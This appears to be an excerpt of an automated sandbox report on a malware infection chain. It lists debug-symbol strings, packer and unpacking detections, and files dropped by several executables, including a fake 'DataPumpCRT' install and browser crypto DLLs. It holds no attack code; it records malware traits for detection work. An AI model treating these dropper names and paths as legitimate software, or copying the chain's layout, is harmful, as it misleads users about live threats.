Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000C7A000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000003709000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: dialer.exe, 00000022.00000003.2220836922.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbW source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdbUGP source: dialer.exe, 00000022.00000003.2220836922.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb source: 9E77.exe, 0000001E.00000000.2147800104.000000000044D000.00000002.00000001.01000000.0000001B.sdmp, 9E77.exe, 0000001E.00000003.2173350757.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000022.00000003.2208403295.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mentorship_and_software_support.pdb source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: kernelbase.pdbUGP source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000022.00000003.2208403295.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Serialize.pdb source: 88D9.exe, 00000013.00000000.2063363979.0000000000AE2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 4854.exe, 00000004.00000002.1911380987.00000000049FC000.00000004.00000800.00020000.00000000.sdmp, 4854.exe, 00000004.00000002.1911380987.0000000004871000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2549281666.0000000006F66000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2549281666.00000000070F1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tutewi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Unpacked PE file: 17.2.toolspub2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zomoxol:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Unpacked PE file: 31.2.nsa984B.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Unpacked PE file: 35.2.CFAA.exe.2f0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Unpacked PE file: 40.2.datapumpcrt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.flang:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Unpacked PE file: 31.2.nsa984B.tmp.exe.400000.0.unpack
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Unpacked PE file: 40.2.datapumpcrt.exe.400000.0.unpack

Source: 4854.exe.1.dr

Static PE information: 0x99297DA6 [Tue Jun 6 02:59:50 2051 UTC]

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE3B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

4_2_6CE3B6C0

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: uVQLD8YVk6.exe	Static PE information: real checksum: 0xcfb7 should be: 0xd221
Source: F38F.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x3832d7
Source: C086.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x5980e
Source: 928F.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x53e437
Source: 33A6.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x58cc2
Source: 4854.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4a19ec

Source: CFAA.exe.1.dr	Static PE information: section name:
Source: CFAA.exe.1.dr	Static PE information: section name:
Source: CFAA.exe.1.dr	Static PE information: section name:
Source: CFAA.exe.1.dr	Static PE information: section name: .themida
Source: CFAA.exe.1.dr	Static PE information: section name: .boot

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE8CC2B push ecx; ret	4_2_6CE8CC3E
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE8D565 push ecx; ret	4_2_6CE8D578
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_058338F8 push esp; iretd	4_2_058338F9
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E64F0C pushfd ; retf	4_2_07E64F15
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E61BA0 push eax; rep ret	4_2_07E61BA1
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004038CD push ecx; ret	14_2_004038E0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005C1977 push ebx; iretd	14_2_005C19B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005C1970 push ebx; iretd	14_2_005C19B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005C198B push ebx; iretd	14_2_005C19B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006C49FE push ss; retf	14_2_006C4A36
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006C31DD pushad ; iretd	14_2_006C31E3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006C498B push ss; retf	14_2_006C4A36
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006C4AAB pushfd ; ret	14_2_006C4AC5
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006BE351 push ebx; iretd	14_2_006BE37C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006BE33C push ebx; iretd	14_2_006BE37C
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_02A8DC85 pushad ; ret	15_2_02A8DC97
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_02A8B16B pushfd ; ret	15_2_02A8B1B3
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_02A8DD61 pushad ; ret	15_2_02A8DD88
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011D0 push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011D7 push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011EB push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_004065B8 push 004065F5h; ret	18_2_004065ED
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_004040B5 push eax; ret	18_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00408104 push ecx; mov dword ptr [esp], eax	18_2_00408109
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00404185 push 00404391h; ret	18_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00404206 push 00404391h; ret	18_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_0040C218 push eax; ret	18_2_0040C219
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_004042E8 push 00404391h; ret	18_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00404283 push 00404391h; ret	18_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00408F38 push 00408F6Bh; ret	18_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00409954 push 00409991h; ret	23_2_00409989

Source: initial sample	Static PE information: section name: .text entropy: 7.070222172340171
Source: initial sample	Static PE information: section name: .text entropy: 7.9935872126747025
Source: initial sample	Static PE information: section name: entropy: 7.977888588281988
Source: initial sample	Static PE information: section name: .text entropy: 7.669683784686144

Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T2EVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\780F.exe	File created: C:\Users\user\AppData\Local\Temp\etopt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EH959.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Local\Temp\nso923F.tmp\Zip.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TU4E5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\780F.exe	File created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\nsn8FCF.tmp\INetC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DC7RD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8V27N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-4LAMA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8EMRV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L9N3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-61EBL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C086.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hivwauv	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4854.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PK4J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-646RI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QBH3J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8B32G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	File created: C:\ProgramData\Bytematrix74\Bytematrix74.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9E77.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CFAA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DKM5H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Local\Temp\nso923F.tmp\Checker.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-SA8KK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\780F.exe	File created: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
